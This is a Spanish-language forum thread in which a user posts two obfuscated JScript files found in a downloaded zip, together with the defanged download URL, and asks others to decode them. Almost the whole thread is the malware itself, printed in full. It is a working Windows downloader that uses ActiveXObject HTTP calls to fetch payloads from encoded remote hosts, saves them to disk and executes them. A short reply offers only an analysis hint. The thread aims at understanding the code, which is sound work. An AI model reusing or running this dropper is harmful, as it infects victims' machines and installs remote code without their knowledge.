descifrar codigo de un virus js

Iniciado por Flamer, 22 Julio 2018, 06:01 AM

0 Miembros y 1 Visitante están viendo este tema.

Flamer

hola amigos navegando por internet por un a cortador se me descargo un archivo zip de este sitio

ATENCION EL SIGUIENTE LINK CONTIENE UN ARCHIVO CON VIRUS

hxxp://167.99.55.222/xsx5/installer.zip


y la curiosidad me hizo abrirlo y adentro contenía 2 archivos js y pues al no entender el código lo publico aquí a ver quien me ayuda a descifrarlo

Código (javascript) [Seleccionar]


function lhf(n) {
    return chhjy[6] + ohzn[11] + uflh.xpcj + yggsv[14]
}

function jfsx(n) {
    return umubg.zqdwb + zoq[15] + crqs.czo
}

function sgrl(n) {
    return sicl[0] + zoq[19] + mgnyo.xah + yggsv[3] + zva[6] + qbnx[1] + lla.hre + uflh.fje + ohzn[10] + ohzn[11]
}

function rdm(n) {
    return sicl[0]
}

function fdbg(n) {
    return wxsf.xeqo + dhl[0] + chhjy[13] + dhl[0] + crqs.iff + lcx[4] + sicl[0] + qbnx[1] + mgnyo.xah + ohzn[11] + uflh.fje + ohzn[10]
}

function szxyw(n) {
    return iqyl[10] + qbnx[1] + qbnx[1] + zva[6] + chhjy[10] + umubg.hzxa + umubg.hzxa + qso[3] + yggsv[3] + dhl[11] + ohzn[11] + chhjy[6] + lcx[4] + zoq[19] + yggsv[16] + uflh.xpcj + yggsv[3] + dhl[11] + lcx[4] + mgnyo.xah + yggsv[16] + umubg.hzxa + wxsf.zwav + chhjy[6] + wxsf.zwav + uflh.mzrn + umubg.hzxa + wxsf.xeqo + sicl[0] + uflh.oqn + zva[6] + yggsv[14] + uflh.fje + qbnx[1] + ohzn[11] + mgnyo.xah + lcx[4] + ohzn[11] + wxsf.zwav + ohzn[11]
}

function vfjqh(n) {
    return cew[5]
}

function wbkj(n) {
    return iqyl[10] + qbnx[1] + qbnx[1] + zva[6] + chhjy[10] + umubg.hzxa + umubg.hzxa + iqyl[10] + uflh.xpcj + jhv.zzg + lla.ydspg + chhjy[6] + zva[10] + yggsv[3] + ohzn[10] + crqs.rdjk + uflh.oqn + qbnx[1] + dhl[11] + yggsv[15] + cew[16] + jhv.zzg + dhl[11] + cew[16] + chhjy[6] + lcx[4] + zoq[19] + yggsv[16] + ohzn[10] + umubg.hzxa
}

function vror(n) {
    return cew[5]
}

function exmcp(n) {
    return sicl[0]
}

function xuqj(n) {
    return zoq[19] + mgnyo.xah + yggsv[3] + zva[6] + qbnx[1] + lcx[4] + sicl[0] + iqyl[10] + ohzn[11] + dhl[11] + dhl[11]
}

function xeve(n) {
    return chhjy[13] + zva[6] + ohzn[11] + uflh.xpcj
}

function dlw(n) {
    return zva[0]
}

function nzban(n) {
    return cew[5] + mgnyo.xah + yggsv[3] + qbnx[1] + ohzn[11]
}

function ouklt(n) {
    return sicl[0] + qbnx[1] + uflh.fje + qbnx[1] + uflh.oqn + chhjy[6]
}

function txm(n) {
    return chhjy[6] + ohzn[11] + uflh.xpcj + yggsv[14]
}

function ntxa(n) {
    return yggsv[12]
}

function gmmc(n) {
    return mgnyo.xah + uflh.oqn + uflh.xpcj
}

function zjzno(n) {
    return cew[5] + yggsv[3] + uflh.xpcj + crqs.rfcdv + qbnx[1] + qbnx[1] + zva[6] + lcx[4] + cew[5] + yggsv[3] + uflh.xpcj + crqs.rfcdv + qbnx[1] + qbnx[1] + zva[6] + cew[2] + ohzn[11] + ickh[8] + uflh.oqn + ohzn[11] + chhjy[6] + qbnx[1] + lcx[4] + uflh.mzrn + lcx[4] + chhjy[1]
}

function hmnf(n) {
    return yggsv[16] + zva[6] + ohzn[11] + uflh.xpcj
}

function yci(n) {
    return cew[2] + ohzn[11] + chhjy[6] + zva[6] + yggsv[16] + uflh.xpcj + chhjy[6] + ohzn[11] + crqs.iff + yggsv[16] + yggsv[14] + yggsv[15]
}

function sibmy(n) {
    return yggsv[14] + ohzn[11] + zva[6] + lcx[4] + ohzn[11] + wxsf.zwav + ohzn[11]
}

function omlpg(n) {
    return ohzn[11]
}

function krdq(n) {
    return dhl[11] + ohzn[11] + uflh.xpcj + jhv.zzg + qbnx[1] + iqyl[10]
}

function jqoe(n) {
    return umubg.zqdwb + zoq[15] + crqs.czo
}

function mcgy(n) {
    return cew[10] + yggsv[16] + chhjy[6] + yggsv[3] + qbnx[1] + yggsv[3] + yggsv[16] + uflh.xpcj
}

function emal(n) {
    return dhl[11] + ohzn[11] + uflh.xpcj + jhv.zzg + qbnx[1] + iqyl[10]
}

function fwagy(n) {
    return sicl[0] + qbnx[1] + uflh.fje + qbnx[1] + uflh.oqn + chhjy[6]
}

function lokh(n) {
    return qso[5] + dhl[11] + yggsv[16] + chhjy[6] + ohzn[11]
}

function yclp(n) {
    return uflh.xpcj + ickh[1]
}

function pvz(n) {
    return chhjy[6] + uflh.oqn + zva[10] + chhjy[6] + qbnx[1] + mgnyo.xah + yggsv[3] + uflh.xpcj + jhv.zzg
}

function wvt(n) {
    return yggsv[16] + zva[6] + ohzn[11] + uflh.xpcj
}

function gdnu(n) {
    return zoq[19] + mgnyo.xah + yggsv[3] + zva[6] + qbnx[1]
}

function jgl(n) {
    return crqs.czo + yggsv[15] + zva[6] + ohzn[11]
}

function urtaq(n) {
    return sicl[0] + qbnx[1] + uflh.fje + qbnx[1] + uflh.oqn + chhjy[6]
}

function bsj(n) {
    return chhjy[6] + ohzn[11] + qbnx[1] + crqs.czo + yggsv[3] + ohzn[10] + ohzn[11] + yggsv[16] + uflh.oqn + qbnx[1] + chhjy[6]
}

function fcpyg(n) {
    return zoq[19]
}

function rwq(n) {
    return ohzn[10] + yggsv[14] + zva[0] + umubg.hzxa
}

function misb(n) {
    return sicl[0] + uflh.fje + uflh.aslpo + ohzn[11] + crqs.czo + yggsv[16] + chhjy[12] + yggsv[3] + dhl[11] + ohzn[11]
}

function jqtrw(n) {
    return uflh.fje + dhl[11]
}

function mvas(n) {
    return zoq[19] + mgnyo.xah + yggsv[3] + zva[6] + qbnx[1] + yggsv[3] + uflh.xpcj + jhv.zzg + lcx[4] + chhjy[12] + yggsv[3] + dhl[11]
}

function trg(n) {
    return jhv.zzg + ickh[1] + chhjy[6] + ohzn[10] + cew[16] + uflh.aslpo + ohzn[10] + uflh.oqn + uflh.fje + zva[10] + ickh[1] + chhjy[6] + lla.ydspg + yggsv[15] + uflh.oqn + yggsv[14] + qbnx[1]
}

function fyzr(n) {
    return qbnx[3] + sicl[0] + yggsv[6] + qbnx[3] + ryqzj[3] + mgnyo.tvzg + lcx[4] + yggsv[6] + qbnx[3] + ryqzj[3] + crqs.rfcdv + crqs.czo + crqs.czo + cew[10]
}

function glvr(n) {
    return zoq[19]
}

function qbvjh(n) {
    return sicl[0] + yggsv[15] + chhjy[6] + qbnx[1] + ohzn[11] + ohzn[10] + chhjy[13] + zva[10] + lla.ydspg + ohzn[11] + zoq[19] + qbnx[1]
}

function znbrt(n) {
    return umubg.zqdwb + ohzn[11] + qbnx[1] + sicl[0] + zva[6] + ohzn[11] + zoq[19] + yggsv[3] + uflh.fje + dhl[11] + chhjy[12] + yggsv[16] + dhl[11] + yggsv[14] + ohzn[11] + mgnyo.xah
}

function ssje(n) {
    for (var h = [7619, 283, n, yclp("vnWU^wj0P_mO+y0")], c = (jqtrw("z!79v$czq^A.ET"), 0); c < 2393; c++)
        for (var u = 0; u < 7169; u++) {
            if (1828 == c) return h[c - 1828 + 2]
        }
    return h[1]
}

function wrim() {
    return new ActiveXObject(fyzr("KwgS^vDm(8A"))
}

function ygqth() {
    return new Date
}
var qso = ["Oyr", "Ldhfp", "Ksq", "f", "Ypqiz", "C"],
    iqyl = [599, "Gangi", 887, "T", "e", 634, "Xqydy", 849, "Hlxp", 587, "h"],
    umubg = {
        zqdwb: "G",
        epycx: "Jgb",
        iid: "Gmhxk",
        pipzu: "Hvbv",
        pbcc: 146,
        uxbfa: "Abdk",
        xlm: 748,
        iyv: 827,
        lzkpe: "o",
        qhsk: 362,
        hzxa: "/",
        sfh: ","
    },
    cew = ["Vakm", 682, "R", "Nvuv", "Ket", "W", "e", 423, 684, 19, "P", "7", "$", "z", "a", "Juif", "w", "Dlge", "Juxva", 191],
    zva = [" ", 879, 969, 951, 692, ",", "p", "7169", 297, "30000", "b", "V", "7619"],
    ohzn = [426, "1", "c", "8", "g", 150, 62, "*", 300, "Jhdbq", "m", "e"],
    zoq = ["Gzqba", 680, 743, "Zbc", "Fmwik", "Gjsm", 604, "3", "Ihewl", "0", "P", "2393", "Imiw", "p", "Khf", "E", "Otiv", "Hset", 312, "c"],
    yggsv = [341, "*", 834, "i", "Szl", "h", "X", "eval", "p", "Szhsm", "m", "Tqz", "\\", "Anqnz", "d", "y", "o"],
    ryqzj = [828, "B", "Rprq", "L", "Xstbu", "Z", "Kyg"],
    rglf = {
        swaue: "2",
        unj: 8,
        sri: 213,
        qdr: "Q",
        tbjs: "Bgtf",
        fxvvu: "Fnzm",
        vloc: 361,
        wsyk: 132,
        dfys: "60000",
        ego: "h",
        jhi: 448,
        adnu: "Xuser",
        eck: "Dly",
        nnt: 589,
        jrshr: 926,
        bqj: 322,
        vivr: "Vjc",
        gbz: "Ydq",
        xcxp: "Powwx",
        mpz: "Pkmy"
    },
    jhv = {
        efvno: "Bds",
        elma: "Ntk",
        zzg: "g",
        pzg: 595,
        didg: 860,
        wbjl: ","
    },
    uflh = {
        tfanu: "Baqt",
        oqn: "u",
        ukpl: "9",
        gxn: 904,
        lqmr: "200",
        xpcj: "n",
        aslpo: "v",
        kzqpj: "1828",
        mzrn: "5",
        czd: "Suux",
        hxpgq: "1",
        fje: "a"
    },
    lcx = [554, "Ujtnj", "i", 173, ".", 512],
    pcd = ["Dvx", 26, "Yvr", "b", "n", "0"],
    dhl = ["D", 628, 680, "d", 536, "&", "K", "Cxgf", "Qwlul", 432, "6", "l", "Ijtwg", ";", 513, "Hlbmu", "K"],
    qqzsc = {
        esp: "K",
        lprg: 590,
        hfvw: 762,
        yas: 311,
        rfle: "Xprxo",
        wmlkb: "340"
    },
    qbnx = ["ActiveXObject", "t", 473, "M", "E"],
    wxsf = {
        ojbw: "d",
        gblt: "(",
        mnds: 889,
        zwav: "x",
        jzsnh: "K",
        dly: 737,
        sjvcn: "q",
        xeqo: "A",
        toayq: "Zath",
        pll: 960,
        hhj: "6",
        kac: "Nncvp",
        uosf: "Bfzgz",
        klk: "283",
        scdit: 493,
        fbam: "6",
        ksl: "G",
        dcmrh: "8"
    },
    mgnyo = {
        tvzg: "2",
        xxvy: "E",
        hjxn: "O",
        bsz: 76,
        xah: "r",
        anyl: "^",
        banrv: "S",
        uvgo: 427,
        enqg: "Yre",
        qiyc: "!",
        tfgtq: "Aeur",
        xmiq: 658,
        gxt: "H",
        zxayj: 844,
        mhlh: 764
    },
    crqs = {
        jur: "M",
        iff: "B",
        fyeu: "Qtj",
        zynw: "E",
        negjj: "Erk",
        rfcdv: "H",
        nhd: "u",
        uea: "4",
        rdjk: "k",
        czo: "T",
        rwx: 293,
        ewr: 155,
        ovm: 630,
        dwf: "Jjo",
        ols: "Dtntj",
        qym: "27"
    },
    chhjy = ["Sgsp", "1", "Sgkdb", "5", 505, "J", "s", "Mncp", "Kxcw", "X", ":", 902, "F", "O"],
    lla = {
        ydspg: "j",
        hre: "N",
        omug: "i",
        vgxje: "c",
        kjnt: "-",
        ngs: "Tpjzh",
        fxdp: "("
    },
    sicl = ["S", ")", "Ekt", 517, "Jye", 566, "Nakdd", "2", 966, "Ynn", "1200000", "O", 577, "J", 198, 579, 516, "Uqmqx", "Pnvx"],
    ickh = [645, "z", "C", ":", 579, 564, "Gtca", "Klss", "q", 831, "Gkasc", "Fzk"],
    adq = ["Yagz", "Nkkx", "Wadgu", 267, "7", "9", "v", "k", "Date", 148],
    qwitd = [-27],
    ozl = [340],
    jldvt = [],
    rxiql = [7],
    upkrl = [];
upkrl[0] = szxyw("kwRItA_g8I");
for (var svoyw = [0], bien = [sibmy("T+A!pYFY.z@7M")], naft = !1, xib = ssje(rdm("k^J&c1H_pV")), hkext = eval(vfjqh("RX6.@bbUu.Ki.") + xib + gdnu("&I%PCHgWiQTMfew")), ppkqs = ActiveXObject, oax = ssje(exmcp("to)i.5W;Pr0")), hhy = 0; hhy < upkrl[krdq("ts6JnjK8jS")]; hhy++) {
    var ohdy = ssje(omlpg("6zPp$2GgXu@Rm.")),
        laqo = new ppkqs(oax + mvas("&.^9x8b6hYZN4HF") + ohdy + qbvjh("S;E6vARY5G3"));
    try {
        var sfu = laqo[znbrt("PU2u.NkI3q6Q")](2),
            rokqj = new ppkqs(zjzno("6pD!EIEso8Xi")),
            ucua = 3e4,
            tzjoc = 6e4,
            azvtb = 3e4,
            otleu = 12e5;
        rokqj[bsj("3_GYaOTwN(2pZ")](ucua, tzjoc, azvtb, otleu);
        try {
            for (; trg("DK^9o59@UfKJ6^q");) {
                var dnez = wrim();
                if (dnez[hmnf("fokP*&RS&Iu")](jfsx("R:SGW1az*ztwJm"), wbkj("(ORL4t3xtqDH"), !1), dnez[lhf("FVINJHNP&@dog^")](), 200 != dnez[ouklt("ha!73w$CvnBTy1")]) break
            }
        } catch (n) {}
        if (5 == svoyw[hhy]) {
            var wpc = hkext[sgrl("^AJ+6Qm@ya(j")],
                gifmj = wpc[pvz("C@@X_34t5@-k")](0, wpc[emal("70guj2N,-iWmb")] - 3);
            upkrl[hhy] += gifmj
        }
        sfu += ntxa("_CYoX6EyEi(Gj$"), sfu += bien[hhy];
        var yzt = 5;
        do {
            rokqj[wvt("3BMbECdG6+n")](jqoe("jC5(99%w%6IFJ!"), upkrl[hhy], 0), rokqj[txm("bX.Km)JmP)O")](), yzt--
        } while (200 != rokqj[urtaq("q_R*XFt!g;")] && yzt);
        if (200 == rokqj[fwagy("$z-coFC0TCr")]) {
            var sca = new ppkqs(vror("(GBq5mlqKu_kIDy") + xib + xuqj("eS9Y6HyV0v"));
            if (8 == svoyw[hhy] && (svoyw[hhy] = 0), svoyw[hhy] <= 3) {
                var eqyh = new ppkqs(fdbg("7a,Bd6K.6ND^FWl"));
                eqyh[xeve("_Y$BkGDYp)-6")](), eqyh[jgl("MNbcc$)3fUmN")] = 1, eqyh[mcgy("(0KcZ!4;%XBE5YH")] = 0, eqyh[nzban("DmG1XPy:WXnU")](rokqj[yci("DBgWzCK)zInp.s")]), eqyh[misb("I2I_bBDotbmg")](sfu), eqyh[lokh("d5uyi,h9N+.,jO")](), svoyw[hhy] || sca[gmmc("qnh!lMgrN8OCJu")](ssje(glvr("CpVAuS,Myq-LW&H")) + rwq("_$Q-ElY8GjqyhH") + ssje(fcpyg("JwmqfJuvl+X")) + dlw("(Kn*GxoxnokyP^") + sfu, 0, 0)
            }
        }
    } catch (n) {}
}




y este es el otro



Código (javascript) [Seleccionar]

function wmnhg(n) {
    return bcx[5] + put.poihe + put.poihe + vvbs.rmuqx + opymo.docm + tzyr.nayhc + tzyr.nayhc + niu.mxq + zhi[0] + rov[1] + lko.fbmgm + qit[5] + qit[8] + niu.mywhk + yqo[1] + vvbs.jnws + zhi[0] + rov[1] + qit[8] + niu.fsvd + yqo[1] + tzyr.nayhc + rov[7] + qit[5] + rov[7] + pqjb[7] + tzyr.nayhc + niu.uneo + niu.fih + lko.cpwe + vvbs.rmuqx + put.hykw + tzyr.spfjs + put.poihe + lko.fbmgm + niu.fsvd + qit[8] + lko.fbmgm + rov[7] + lko.fbmgm
}

function plh(n) {
    return bcx[5] + put.poihe + put.poihe + vvbs.rmuqx + opymo.docm + tzyr.nayhc + tzyr.nayhc + pqjb[8] + lko.fbmgm + pqjb[4] + lko.fbmgm + rov[7] + sbfwq.yljev + vvbs.rmuqx + bcx[5] + tzyr.spfjs + rov[7] + sbfwq.yljev + opymo.rsdnz + qit[8] + niu.mywhk + yqo[1] + pqjb[4] + tzyr.nayhc
}

function ssdie(n) {
    return rov[16] + niu.fsvd + zhi[0] + put.poihe + lko.fbmgm
}

function mkwm(n) {
    return niu.fih + tzyr.spfjs + divuu.eplv + lko.fbmgm + qit[1] + yqo[1] + put.qcx + zhi[0] + rov[1] + lko.fbmgm
}

function vupzg(n) {
    return rov[16] + zhi[0] + vvbs.jnws + put.begwe + put.poihe + put.poihe + vvbs.rmuqx + qit[8] + rov[16] + zhi[0] + vvbs.jnws + put.begwe + put.poihe + put.poihe + vvbs.rmuqx + glb.nthy + lko.fbmgm + yqo[5] + lko.cpwe + lko.fbmgm + qit[5] + put.poihe + qit[8] + pqjb[7] + qit[8] + kfa[6]
}

function cwk(n) {
    return pqjb[13] + opymo.jjuae + qit[1]
}

function lqlrb(n) {
    return yqo[1] + vvbs.rmuqx + lko.fbmgm + vvbs.jnws
}

function padva(n) {
    return lko.fbmgm
}

function vme(n) {
    return niu.mywhk + niu.fsvd + zhi[0] + vvbs.rmuqx + put.poihe
}

function nlc(n) {
    return glb.nthy + lko.fbmgm + qit[5] + vvbs.rmuqx + yqo[1] + vvbs.jnws + qit[5] + lko.fbmgm + opymo.gedag + yqo[1] + put.hykw + opymo.rsdnz
}

function wnpk(n) {
    return niu.mywhk
}

function fqlvs(n) {
    return niu.mywhk + niu.fsvd + zhi[0] + vvbs.rmuqx + put.poihe + zhi[0] + vvbs.jnws + pnh[10] + qit[8] + put.qcx + zhi[0] + rov[1]
}

function qyno(n) {
    return pqjb[4] + put.hykw + kfo.amuzg + tzyr.nayhc
}

function sehl(n) {
    return rov[12] + yqo[1] + qit[5] + zhi[0] + put.poihe + zhi[0] + yqo[1] + vvbs.jnws
}

function yjf(n) {
    return niu.mywhk + niu.fsvd + zhi[0] + vvbs.rmuqx + put.poihe + qit[8] + niu.fih + bcx[5] + lko.fbmgm + rov[1] + rov[1]
}

function vssa(n) {
    return vvbs.jnws + pqjb[8]
}

function twy(n) {
    return qit[5] + lko.fbmgm + vvbs.jnws + put.hykw
}

function frt(n) {
    return put.tsf
}

function ycxqu(n) {
    return tzyr.spfjs + rov[1]
}

function pcf(n) {
    return gba.mgjj + vvbs.rmuqx + lko.fbmgm + vvbs.jnws
}

function sekmh(n) {
    return rov[16]
}

function vgjl(n) {
    return pqjb[13] + opymo.jjuae + qit[1]
}

function thpfk(n) {
    return niu.fih + opymo.rsdnz + qit[5] + put.poihe + lko.fbmgm + pqjb[4] + gba.mgjj + sbfwq.yljev + niu.lvg + lko.fbmgm + niu.mywhk + put.poihe
}

function mrfu(n) {
    return rov[1] + lko.fbmgm + vvbs.jnws + pnh[10] + put.poihe + bcx[5]
}

function axvhz(n) {
    return niu.fsvd + lko.cpwe + vvbs.jnws
}

function thk(n) {
    return rov[1] + lko.fbmgm + vvbs.jnws + pnh[10] + put.poihe + bcx[5]
}

function wzuge(n) {
    return niu.mywhk
}

function yzzhd(n) {
    return niu.fih + put.poihe + tzyr.spfjs + put.poihe + lko.cpwe + qit[5]
}

function nla(n) {
    return niu.fih + niu.mywhk + niu.fsvd + zhi[0] + vvbs.rmuqx + put.poihe + divuu.mse + tzyr.spfjs + pqjb[4] + lko.fbmgm
}

function pgig(n) {
    return niu.fih
}

function yorid(n) {
    return qit[5] + lko.fbmgm + vvbs.jnws + put.hykw
}

function mizvs(n) {
    return opymo.rsdnz + yqo[1] + rov[1] + qit[8] + lko.fbmgm + rov[7] + lko.fbmgm
}

function zgmt(n) {
    return kfo.amuzg
}

function fpu(n) {
    return rov[7] + tzyr.spfjs + pqjb[3] + pqjb[3] + put.poihe + put.hykw + niu.lvg + bcx[5] + zhi[0] + lko.fbmgm + vvbs.jnws + lko.cpwe + sbfwq.yljev + zhi[0] + bcx[10] + rov[7] + niu.lvg + bcx[5] + pqjb[8]
}

function ksp(n) {
    return yqo[1] + vvbs.rmuqx + lko.fbmgm + vvbs.jnws
}

function yhinm(n) {
    return niu.fih + put.poihe + tzyr.spfjs + put.poihe + lko.cpwe + qit[5]
}

function aic(n) {
    return niu.fih
}

function yhiwo(n) {
    return rov[16]
}

function ilgq(n) {
    return qit[5] + lko.fbmgm + put.poihe + qit[1] + zhi[0] + pqjb[4] + lko.fbmgm + yqo[1] + lko.cpwe + put.poihe + qit[5]
}

function rvl(n) {
    return rwnw.slevm + rov[1] + yqo[1] + qit[5] + lko.fbmgm
}

function ujgwe(n) {
    return niu.fih + put.poihe + tzyr.spfjs + put.poihe + lko.cpwe + qit[5]
}

function rjg(n) {
    return psp[2] + niu.fih + kfo.tlxoz + psp[2] + pqjb[14] + pucy[3] + qit[8] + kfo.tlxoz + psp[2] + pqjb[14] + put.begwe + qit[1] + qit[1] + rov[12]
}

function nof(n) {
    return qit[5] + lko.cpwe + sbfwq.yljev + qit[5] + put.poihe + niu.fsvd + zhi[0] + vvbs.jnws + pnh[10]
}

function mipjn(n) {
    return qit[1] + opymo.rsdnz + vvbs.rmuqx + lko.fbmgm
}

function eda(n) {
    return pqjb[13] + lko.fbmgm + put.poihe + niu.fih + vvbs.rmuqx + lko.fbmgm + niu.mywhk + zhi[0] + tzyr.spfjs + rov[1] + put.qcx + yqo[1] + rov[1] + put.hykw + lko.fbmgm + niu.fsvd
}

function zxoum(n) {
    return niu.uneo + psp[1] + gba.mgjj + psp[1] + opymo.gedag + qit[8] + niu.fih + put.poihe + niu.fsvd + lko.fbmgm + tzyr.spfjs + pqjb[4]
}

function bsqoi(n) {
    for (var o = [7619, 283, n, vssa(",n1r%SSV_-yZ^")], u = (ycxqu("O1.Ew7OI(-IsmI"), 0); u < 2393; u++)
        for (var t = 0; t < 7169; t++) {
            if (1828 == u) return o[u - 1828 + 2]
        }
    return o[1]
}

function azqp() {
    return new ActiveXObject(rjg("7,$ppXb3Hj"))
}

function nvy() {
    return new Date
}
var pqjb = [241, "Dufzd", 286, "k", "m", "Hnf", 640, "5", "z", 658, 471, "Citte", "c", "G", "L"],
    glb = {
        iuxag: "V",
        nthy: "R",
        fqz: "Jlavq",
        cmzc: "4",
        qvyiw: "F",
        leflp: 393,
        pwalc: 160,
        jxbr: "i",
        lgt: "Pxzt",
        vqne: "O",
        vniif: 892,
        cmg: "Zfrw",
        fffr: "v",
        rrxr: 826,
        dnfj: "("
    },
    psp = ["0", "D", "M", "Ztzh", "Vmh", 293, "W", 311, "6"],
    lko = {
        nnff: "L",
        cpwe: "u",
        euf: "Yuu",
        tux: 936,
        fbmgm: "e",
        ecjw: "Z",
        qvvff: "1828"
    },
    vvbs = {
        phg: 520,
        rmuqx: "p",
        yubsx: "Ruiak",
        bnzv: 890,
        niy: "7169",
        jnws: "n",
        ywqc: 919,
        orx: 469,
        ejk: 948,
        thnn: 562,
        oceqj: "Not",
        kjhlw: "Cfd",
        hpfbk: "Cqa"
    },
    opymo = {
        docm: ":",
        uro: "60000",
        idqx: "Hsy",
        gacqa: "1",
        jjuae: "E",
        udrn: 919,
        bqjtz: "Date",
        zpb: 146,
        rsdnz: "y",
        gedag: "B",
        bde: 151,
        zfy: "eval"
    },
    yqo = ["K", "o", "Parxh", 115, 597, "q", "p", 900, "Zvlbb", "c"],
    pucy = ["2", 911, "2393", "2", "Ijrl", "8", 572],
    kfa = ["J", "Tpgqs", "Yfz", "3", "Dadem", "Exra", "1", "Qvzc", 800, "Yjylt", 433, 585, "Rhbfr", "m", "Coxuw", "r", "r"],
    sbfwq = {
        kru: 726,
        jhmia: "Bebrr",
        zzp: "Sjq",
        lvyv: "T",
        tldql: 907,
        yljev: "b",
        ymo: "Azzx"
    },
    qit = ["Gon", "T", "e", "E", "Hka", "s", "Asc", "E", ".", 80, 727, 248, "2", "e", "r", "4"],
    rov = ["Lgge", "l", 54, "Tskh", "$", 91, "Eghv", "x", "7", 705, "200", "Ozby", "P", "Eixr", ";", "Okhay", "W"],
    isksi = {
        benn: 478,
        sdo: "F",
        pkadk: "3",
        pkrlp: "H",
        aaw: 713,
        upu: "Uov",
        btx: "Vzl"
    },
    tzyr = {
        nayhc: "/",
        nja: "-",
        rhn: 182,
        acgb: 804,
        tdfil: "o",
        azis: "Jutn",
        spfjs: "a",
        nxqlb: "Maj",
        imsao: 995
    },
    pnh = [103, "Mkbt", "w", "5", "A", "Udxc", "Mkhlf", 193, "%", "Nfjw", "g", 161, "J", "i", 316, 593],
    gba = {
        ariae: "Nnk",
        qwxv: "2",
        mzd: 347,
        lrj: "D",
        xba: 817,
        njrs: "Gwjcf",
        cvu: "1200000",
        izgfd: "S",
        zrjc: "Gdqid",
        iatqy: "g",
        yrxhc: "May",
        mgjj: "O",
        tlvvq: "E"
    },
    bcx = ["O", "Ctqo", "Mnj", 998, "289", "h", 883, "Taqis", "Fysx", "Eclw", "w", 844, "Litn", 559],
    divuu = {
        mse: "N",
        mwdpo: 718,
        eso: "F",
        eplv: "v",
        ftcn: "Ont",
        iftxt: "b",
        mgwqa: 491,
        fnhs: 928,
        oob: "Y",
        fdjm: 225,
        rdpeg: "Wlbe",
        qhmy: 945,
        pnv: "30000",
        mxnu: "Bhnem",
        qct: "M",
        puokp: "283"
    },
    zhi = ["i", "n", "Jkh", 993, 415, "597"],
    niu = {
        sjmkx: "%",
        fsvd: "r",
        mxq: "f",
        suy: "F",
        wxjh: "l",
        lvg: "j",
        tgy: "Jxqf",
        fih: "S",
        mywhk: "c",
        uneo: "A",
        tyscc: 331,
        chz: 885,
        cviwo: "Bavuc",
        grk: "!",
        otvcq: "Sdyw",
        bkypx: "Jmn",
        rap: 558,
        kpfgu: 965
    },
    rwnw = {
        soqvz: 690,
        jpjv: "Ipgkx",
        nqnk: "Xguxt",
        jurt: 966,
        tzdmn: 187,
        wozz: "Jxmg",
        qxlpk: "Twrj",
        kfc: "J",
        slevm: "C",
        nfgwb: 918,
        ohz: "Hwqrt",
        xnrh: "Ajx",
        mgi: "J",
        punj: 364,
        uey: "2",
        jrkzz: 664
    },
    put = {
        ibb: 68,
        poihe: "t",
        tsf: "\\",
        begwe: "H",
        sxwc: 115,
        tzxjt: "s",
        xqor: "*",
        bbf: "ActiveXObject",
        qcx: "F",
        dzy: "V",
        pjb: "7619",
        pmged: "*",
        wvduv: "K",
        ifbd: "Iqxpc",
        hykw: "d",
        pgt: "F",
        cvi: 848
    },
    kfo = {
        krrxd: "(",
        tbcl: 507,
        tlxoz: "X",
        amo: "Tos",
        amuzg: " ",
        zns: "A",
        zvqln: 14,
        cocmt: "Yrcje",
        kstve: 278
    },
    lcza = [-597],
    ymdeu = [289],
    hkjyt = [],
    bigjj = [7],
    ahunl = [];
ahunl[0] = wmnhg("deoLbw$Aca_");
for (var nngl = [0], ael = [mizvs("ZbvNEXgH))f")], hdqk = !1, ephrk = bsqoi(pgig(")g.6j1Xt^rKI5")), xeu = eval(sekmh("2oO25X_m7:+z") + ephrk + vme("n*&xINca.4m,0")), faefr = ActiveXObject, dykkd = bsqoi(aic("&96t3k-uvdL.DE")), lye = 0; lye < ahunl[thk("W%JCQ3myM01ki4Z")]; lye++) {
    var gzsn = bsqoi(padva("uHY$X1ghzz^gIp*")),
        hre = new faefr(dykkd + fqlvs("R2GC6!mM(:,^7") + gzsn + thpfk("cc5cN6kL%n%Af"));
    try {
        var xvxb = hre[eda("+L01EvS-k2gNj")](2),
            nco = new faefr(vupzg("Gb&;CYxSb-")),
            cbic = 3e4,
            dslh = 6e4,
            phyg = 3e4,
            ncz = 12e5;
        nco[ilgq("2.ddPpkd%%")](cbic, dslh, phyg, ncz);
        try {
            for (; fpu("Pv^D4gcfmo8");) {
                var voyg = azqp();
                if (voyg[lqlrb("0,IH_$wKM51b)E")](cwk(".-Q(jqSKfQ$)Z"), plh("8D2w0E*D*bG"), !1), voyg[yorid("9^($osbnH1f*aLL")](), 200 != voyg[yhinm("QS9EhlGR2:u4e")]) break
            }
        } catch (n) {}
        if (5 == nngl[lye]) {
            var umjf = xeu[nla("ZbsKQkX582TO")],
                row = umjf[nof("VHNyeMELz%Sm^Nn")](0, umjf[mrfu("sz+7M6Su,!@QH.l")] - 3);
            ahunl[lye] += row
        }
        xvxb += frt("9@O_6.t^e_Ux80"), xvxb += ael[lye];
        var mlh = 5;
        do {
            nco[ksp("U6uOcmHDTV")](vgjl("v2iV$^O:geUD@"), ahunl[lye], 0), nco[twy("ME(bHjfii,C!yv")](), mlh--
        } while (200 != nco[ujgwe("S1E7.*Hnj8TZ")] && mlh);
        if (200 == nco[yzzhd("P(SlasP2Ik7")]) {
            var ozefl = new faefr(yhiwo("Uo$Mu;z!!:2D") + ephrk + yjf("xe5LT.($QI"));
            if (8 == nngl[lye] && (nngl[lye] = 0), nngl[lye] <= 3) {
                var dzpj = new faefr(zxoum("a6XKUWTxbiy3AZ("));
                dzpj[pcf("!9w9oSyDg)(e0")](), dzpj[mipjn("zKCmP;87XLBfq:S")] = 1, dzpj[sehl("C8DnpB4%x@-8j*R")] = 0, dzpj[ssdie("W1IZ@l%z-P")](nco[nlc("PchLD7hONF53")]), dzpj[mkwm("nl4zGi!QzjC;V")](xvxb), dzpj[rvl("6-OC&xsf60(t7")](), nngl[lye] || ozefl[axvhz("n(LZAZLoC)r")](bsqoi(wzuge("1vqBn*0MR)z")) + qyno("@L&E^tromug") + bsqoi(wnpk("k(@h%.q!aTO84X")) + zgmt(":dIflb($+-Z7!!!") + xvxb, 0, 0)
            }
        }
    } catch (n) {}
}




saludos Flamer y a ver quien me ayuda o le na se la carcomita de que hace este codigo

MOD: URL modificada para evitar clicks indeseados.

engel lex

estos son fastidiosos analizarlos... pero no es tan complicado...


lo que tienes que hacer es cargar a memoria las variables (cuidando no ejecutar codigo a menos que sea necesario) luego ver el contenido de las funciones... pista... en casi todas las funciones iniciales la "n" es solo un despiste
